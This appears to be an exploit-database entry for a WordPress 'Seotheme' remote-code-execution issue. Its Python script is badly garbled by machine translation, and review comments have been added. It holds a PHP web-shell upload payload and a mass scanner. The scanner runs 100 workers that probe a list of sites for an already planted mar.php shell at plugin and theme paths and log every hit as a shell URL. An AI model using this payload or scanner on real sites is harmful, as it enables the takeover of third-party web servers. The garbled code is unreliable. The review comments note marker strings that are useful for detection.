
WordPress Seotheme - 未经身份验证的远程代码执行

#利用标题: WordPress Seotheme - 未经身份验证的远程代码执行
#日期: 2023-09-20
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,重新
从多处理。
从Colorama进口
来自Colorama Import Init
# NOTE(review): this listing was damaged by machine translation (keywords,
# identifiers and several header names were translated or altered), so it is
# not valid Python as shown. The comments describe only what the visible text does.
# Console colour setup; the names look like colorama's init/Fore — confirm against the original.
init(autoret=true)
fr=fore.red
fc=fore.cyan
fw=fore.white
fg=fore.green
fm=fore.magenta
# PHP payload string: it prints php_uname() and renders a file-upload form whose
# handler copies the uploaded file to its own name. It is assigned here, but no
# visible line below references `shell`.
shell='''?php echo'ex'; echo'br'.php_uname()。'br'; echo'form method='post'enctype='multipart/form-data'input type='file'name='zb'input type='smist'name='upload='upload'value='upload'/form'; if($ _ post ['upload']){if(@copy($ _ files ['zb'] ['tmp_name'],$ _files ['zb'] ['name'])){echo'echo'explo offlo offloing doad done'; } else {echo'无法上传。'; }}}?'''
# Silences urllib3 warnings, including the one emitted when a request is sent
# with certificate verification switched off.
requests.urllib3.disable_warnings()
# Fixed request headers sent with every probe (mobile-browser User-Agent, a
# Referer of 'www.google.com' with no scheme). The set is static, so it may
# serve as a weak fingerprint in web-server logs — verify before relying on it.
标题={'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozlila/5.0(Linux; Android 7.0; SM-G892A BULID/NRD90M; WV)AppleWebKit/537.36(KHTML,像Gecko一样,像Gecko)版本/4.0套餐/4.0
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'}
# Site list: one entry per line, read from the file named by the first
# command-line argument. A missing argument prints a usage hint and exits.
TRY:
target=[i.strip()for i在open(sys.argv [1],mode='r')中。readlines()]
除了IndexError:
路径=str(sys.argv [0])。split('\\')
退出('\ n [!]输入' +路径[len(path)-1] +'sites.txt')
# Reduces a site entry to the part before its first '/': the scheme is removed,
# then everything after a slash is cut off repeatedly until no slash remains.
# NOTE(review): the listing is machine-translation damaged and has lost its
# indentation; this describes the visible statements only.
DEF URLDOMAIN(站点):
# replace() removes every occurrence of the scheme text, not only the leading one.
如果site.startswith('http://'):
site=site.replace('http://','')
Elif Site.startswith('https://'):
site=site.replace('https://','')
否则:
经过
# The greedy group captures up to the last '/', so each pass drops one trailing path segment.
模式=re.compile('(。*)/')
而Re.Findall(模式,站点):
sitez=re.findall(模式,网站)
site=sitez [0]
返回站点
# Checks one site for a file named mar.php at two fixed WordPress paths:
#   /wp-content/plugins/seoplugins/mar.php
#   /wp-content/themes/seotheme/mar.php
# Each path is requested over http and again over https; a response body
# containing the marker string below counts as a hit, and the hit URL is appended
# to seoplugins-shells.txt or Seotheme-Shells.txt.
# NOTE(review): only GET requests are visible here; nothing in this function
# uploads or executes anything. A hit therefore means the file was already on
# the site, so either path existing on an install is best read as a sign of an
# earlier compromise — confirm against the original advisory.
# NOTE(review): indentation was lost in this copy, so the exact nesting of the
# http/https and plugin/theme fallbacks cannot be confirmed from the text.
DEF四百万(URL):
TRY:
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers,laster_redirects=true,timeout=15)
# Marker string looked for in the body; presumably an icon reference embedded
# in the planted page — usable as a content signature when sweeping web roots.
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
url='https://' + urldomain(url)
# The https attempts pass verify=false, i.e. certificate validation is skipped.
check=requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers=headers=true_redirects=true,verify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('seoplugins-shells.txt','a')。写(url +'/wp-content/plugins/seoplugins/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
# Same sequence again for the theme path.
url='http://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers,laster_redirects=true,verifify=false,timeout=15)
如果'//0x5a4555533.github.io/marijuana/icon.png'in Check.Content:
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('Seotheme-Shells.txt','a')。写(url +'/wp-content/themes/seotheme/mar.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
# Bare handler: any error (timeout, DNS failure, a bug in the code above) is
# reported as the same "failed" line, so errors and clean misses look alike.
除:
打印' - | ' + url +' - {} [失败]'。格式(fr)
# Runs the per-site check over the whole target list with a pool of 100 workers,
# then waits for the pool to finish.
# NOTE(review): the closing message names shells.txt, while the check function
# writes to seoplugins-shells.txt and Seotheme-Shells.txt.
MP=池(100)
MP.MAP(四百三个,目标)
mp.close()
MP.Join()
打印'\ n [!] {}保存在shells.txt'.format(fc)中
 